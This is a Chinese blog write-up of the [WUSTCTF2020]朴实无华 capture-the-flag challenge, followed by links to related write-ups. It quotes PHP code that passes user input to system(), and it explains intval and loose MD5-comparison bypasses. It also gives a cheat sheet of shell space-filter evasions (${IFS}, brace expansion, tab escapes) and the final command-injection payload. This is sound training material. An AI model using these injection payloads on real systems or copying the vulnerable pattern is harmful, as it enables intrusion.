[WUSTCTF2020]朴实无华

于 2024-08-07 16:31:21 发布
阅读量469 收藏 11
点赞数 6
分类专栏: # BUUCTF小练习 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beiweixiaotian66/article/details/140995411
版权

文章目录

[WUSTCTF2020]朴实无华

image-20240802173809863

查看robots.txt

访问啥也没有

image-20240807153440543

image-20240807153508999

然后抓包,结合上面的因为不能识别头部信息,可以考虑是不是和header有关,访问/fAke_f1agggg.php并且抓包

image-20240807154104305

看到有个Look at me

然后访问一下

image-20240807154210949

乱码,使用修复文件编码

在火狐中,更多工具 ->定制工具栏里面找

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

有三层绕过

level1

先看第一层绕过,是对intval这个函数的绕过,intval获取变量的整数值,可以看到有个科学计数法,我们试试用科学计数法绕过一下

image-20240807155103913`

?num=2e4

image-20240807155635927

level2

第一层绕过,看看第二层

第二层是个md5绕过

传入的值与md5加密后的值相等

可以用0e215962017,这个值MD5加密后也是0e开头

image-20240807160058590

level3

看看第三层

有个str_ireplace函数就是str_replace忽略大小写

str_replace(
    array|string $search,
    array|string $replace,
    string|array $subject,
    int &$count = null
): string|array

该字符串或数组是将 subject 中全部的 search 都被 replace 替换之后的结果

image-20240807160448913

这道题就是将get_flag里面的cat全部替换成wctf2020,就是不能直接使用cat

先用ls或者dir查看目录

image-20240807160846066

应该是在最长的目录里面

可以使用\的办法,这个题还要将空格进行绕过

绕过空格的方法:

${IFS}$9
{IFS}
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
IFS
< 
<> 
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
%20   (space)
%09   (tab)
X=$'cat\x09./flag.php';$X       (\x09表示tab,也可以用\x20)

绕过cat可以使用\,单引号,双引号绕过,也可以使用别的读取函数

more:一页一页的显示档案内容
less:与 more 类似。但在用 more 时候可能不能向上翻页,不能向上搜索指定字符串,而 less 却可以自由的向上向下翻页,也可以自由的向上向下搜索指定字符串。
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:命令的作用和 cat -n 类似,是将文件内容全部显示在屏幕上,并且是从第一行开始显示,同时会自动打印出行号。
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容。可以利用报错将文件内容带出来(-f<名称文件>  指定名称文件,其内容有一个或多个文件名称时,让file依序辨识这些文件,格式为每列一个文件名称。)

ca\t${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag得到flag

image-20240807161452598

Cyan1u
关注
专栏目录
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 714
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
WUST-CTF web-朴实无华 wp
qq_42188168的博客
03-30 553
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 &am...
[WUSTCTF2020]朴实无华 1(代码审计intval、MD5、ca\t${IFS})
weixin_45577185的博客
09-08 271
刚打开时乱码: 解决方法:firefox浏览器->地址栏点击右键->菜单栏->查看->修复文字编码 发现有bot的字样,打开robots.txt 发现fAke_f1agggg.php,打开 啥都没有,抓一下当前网页的包 发现 /fl4g.php,打开,发现代码 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //leve
web buuctf [WUSTCTF2020]朴实无华
weixin_44214568的博客
04-01 447
1. 根据提示消息应该在头部 2.查看robots.txt (搜索引擎中访问网站的时候要查看的第一个文件) 访问 3.根据头部查看请求头和响应头 4.查看,打开网页里面对汉字的编译是乱码,在火狐浏览器中定制工具里有一个页面编辑的选项,对页面进行编辑,得到源码: <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //...
[WUSTCTF 2020]朴实无华
最新发布
The_Epiphany的博客
03-07 1431
在本题中PHP版本为5.6.40,若传入value为“1e4”第一次会被识别为字符串,返回值为1,后+1时会被识别为数字,返回1e4+1。如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);如果字符串以 "0b" (或 "0B") 开头,使用 2 进制 (binary);如果字符串以 "0" 开始,使用 8 进制(octal);很综合的一道题,虽然比较简单,但是可以用来进行知识巩固,不多逼逼直接开始。弱相等,原理是比较时截断,前保留后丢弃。反斜线:即转义字符;
WUSTCTF2020-朴实无华
Tajang的大千世界
04-24 437
打开靶机,朴实无华 找线索 左找找右找找,发现robots.txt里有东西 进入/fAke_f1agggg.php是假的(早就预料到了) 在当前页面继续找线索,我都扫了啥都没发现,但更细致点就会发现,网络里的响应头里有个 有一说一,这个线索藏得够深,有二说二,chrome的控制台里网络区太烂了,一层一层的 进入/fl4g.php 我已经开始笑了 代码审计 就一点点读呗,不会的函数百度 绕过分为三个部分并且都是GET传值 intval函数绕过 要变量整数值小于2020,又要变量加1大于2021,一
php intval函数用法总结
10-17
这个函数非常实用,尤其是在处理用户输入或从非整数源获取数据时。以下是对 `intval()` 函数的详细说明和使用示例。 ### 1.... ...int intval ( mixed $var [, int $base = 10 ] ) ...- `$var`: 这个必需的参数是要转换成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值